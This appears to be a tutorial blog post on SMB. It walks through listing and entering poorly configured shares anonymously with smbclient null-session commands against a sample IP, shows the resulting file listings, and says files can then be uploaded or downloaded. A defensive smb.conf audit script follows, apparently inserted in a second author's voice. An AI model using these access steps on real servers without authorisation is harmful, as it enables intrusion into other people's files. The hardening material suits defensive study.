What's an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that's incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

Exploiting Badly Configured SMBs

What you'll need:

  1. A machine that can run smbclient command
  2. A vulnerable/poorly configured SMB machine (remote or local)
  3. SMB PORT: 445

Steps:

Check Sharenames

To view the SMB share names, use the command:

```
smbclient -L 192.168.25.1 -N
```

(192.168.25.1 = IP of the vulnerable SMB server)


You'll get something like this:

```
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        arquivos        Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Server               Comment
        ---------            -------
        SAMBA                Samba Server 4.3.9-Ubuntu

        Workgroup            Master
        ---------            -------
        COMPUTACAO           SAMBA
```

After doing that, you'll need to pick a Sharename, for example "arquivos" or "IPC$". I highly recommend picking one whose name doesn't contain the "$" symbol, because those are the ones you're likely to have permissions on.

In this case, I'm going to pick "arquivos" as Sharename.

Finally:

```
smbclient //192.168.25.1/arquivos -N
```

And that's pretty much it.
Now, if the host is badly misconfigured, you can upload files, download files, and so on.

EX:

```
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Jul 19 09:12:48 2016
  ..                                  D        0  Fri May 22 09:25:21 2015
  html                                D        0  Fri Jul 15 03:48:38 2016
  codeigniter                         D        0  Fri Jul  3 17:00:48 2015
  serverconfig.php                    A   100402  Fri Jul 15 03:48:46 2016
  phpmyadmin                          D        0  Fri May 22 16:28:47 2015
  khy                                AR        0  Tue Jul 19 09:12:48 2016
  cgitelnet1                          D        0  Fri Jul 15 05:40:41 2016
  supp1.1                             D        0  Tue Jul  7 19:35:09 2015
  index.html                          N      142  Tue May 10 16:30:59 2016
  teste.php                           A       21  Fri May 22 11:56:35 2015
  enxjdf.exe                          N   571074  Mon Apr 14 16:06:33 2008
  cherno.php                          N   210752  Fri Jul 15 05:13:46 2016

                151380148 blocks of size 1024. 132224492 blocks available
smb: \>
```

You can view all the smbclient commands by typing "?":

```
smb: \> ?
?              allinfo        altname        archive        backup
blocksize      cancel         casesensitive  cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posixencrypt   posixopen      posixmkdir     posixrmdir     posixunlink
print          prompt         put            pwd            q
queue          quit           readlink       rd             recurse
reget          rename         reput          rm             rmdir
showacls       setea          setmode        scopy          stat
symlink        tar            tarmode        timeout        translate
unlock         volume         vuid           wdel           logon
listconnect    showconnect    tcon           tdis           tid
logoff         ..             !
```
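On the Samba side, the misconfiguration that makes the walkthrough above work is an smb.conf that turns unknown logons into guest sessions and marks a share as guest-accessible, which is exactly what `smbclient -N` (no password prompt, i.e. a null session) relies on. The following audit script is an added example, not the post author's script and not Samba's own tooling: it parses an smb.conf and flags the settings that let an anonymous client list and reach shares, using a constructed weak configuration modelled on the `arquivos` share above beside a hardened one. The function names and both sample configurations are assumptions of mine; the parameter names (`map to guest`, `restrict anonymous`, `guest ok`/`public`, `read only`/`writable`) are real smb.conf options, and the checks simplify Samba's full semantics.

```python
"""Hypothetical smb.conf audit (added example, not Samba's tooling):
flag settings that let an anonymous / null-session client reach a share."""
import configparser

_TRUE = {"yes", "true", "1"}


def _truthy(value: str) -> bool:
    return value.strip().lower() in _TRUE


def _first(section, *names, default=""):
    """Return the first of several synonymous smb.conf parameters that is set."""
    for name in names:
        if name in section:
            return section[name].strip()
    return default


def load_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like: [global] plus one section per share; option names
    are case-insensitive and lines may carry trailing ';' or '#' comments."""
    parser = configparser.ConfigParser(
        strict=False,                        # smb.conf tolerates repeated keys
        interpolation=None,                  # values such as %v must not expand
        inline_comment_prefixes=(";", "#"),
    )
    parser.read_string(text)
    return parser


def audit_smb_conf(text: str) -> list:
    """Return (scope, severity, message) tuples describing anonymous exposure."""
    conf = load_smb_conf(text)
    findings = []
    glob = conf["global"] if conf.has_section("global") else {}

    # Failed logons become guest sessions: the classic null-session enabler.
    map_to_guest = _first(glob, "map to guest", default="Never")
    if map_to_guest.lower() != "never":
        findings.append(("global", "high",
                         f"map to guest = {map_to_guest}: failed logons become guest sessions"))

    # restrict anonymous = 2 refuses anonymous IPC$ connections, which is
    # what share enumeration (smbclient -L) uses.
    if _first(glob, "restrict anonymous", default="0") == "0":
        findings.append(("global", "medium",
                         "restrict anonymous = 0: anonymous IPC$ connections can list shares"))

    for name in conf.sections():
        if name.lower() == "global":
            continue
        share = conf[name]
        # 'public' is a synonym of 'guest ok'
        if not _truthy(_first(share, "guest ok", "public", default="no")):
            continue
        # 'read only' is canonical; 'writable'/'writeable' are its inverse
        if "read only" in share:
            writable = not _truthy(share["read only"])
        else:
            writable = _truthy(_first(share, "writable", "writeable", default="no"))
        if writable:
            findings.append((name, "high", "guest ok = yes and writable: anonymous clients can upload"))
        else:
            findings.append((name, "medium", "guest ok = yes: anonymous clients can read this share"))
    return findings


# Constructed sample modelled on the exposed server in the post (weak settings).
WEAK_CONF = """
[global]
   workgroup = COMPUTACAO
   server string = Samba Server %v
   security = user
   map to guest = Bad User   ; unknown users fall through to guest

[arquivos]
   path = /srv/arquivos
   guest ok = yes
   writable = yes
   browseable = yes
"""

# Constructed hardened counterpart: no guest fallback, no anonymous IPC$,
# share limited to an explicit group.
HARDENED_CONF = """
[global]
   workgroup = COMPUTACAO
   server string = Samba Server %v
   security = user
   map to guest = Never
   restrict anonymous = 2

[arquivos]
   path = /srv/arquivos
   valid users = @staff
   read only = no
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for scope, severity, msg in audit_smb_conf(conf) or [("-", "-", "no findings")]:
            print(f"[{severity}] {scope}: {msg}")
```

Running the script reports three findings for the weak sample (guest fallback, anonymous share listing, and a guest-writable `arquivos`) and none for the hardened one; a real audit would point `audit_smb_conf` at the contents of `/etc/samba/smb.conf` and could be extended with `testparm -s` output, which resolves Samba's defaults and synonyms for you.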




I made a Python script that does all the hard work; if you want, you can get it here.
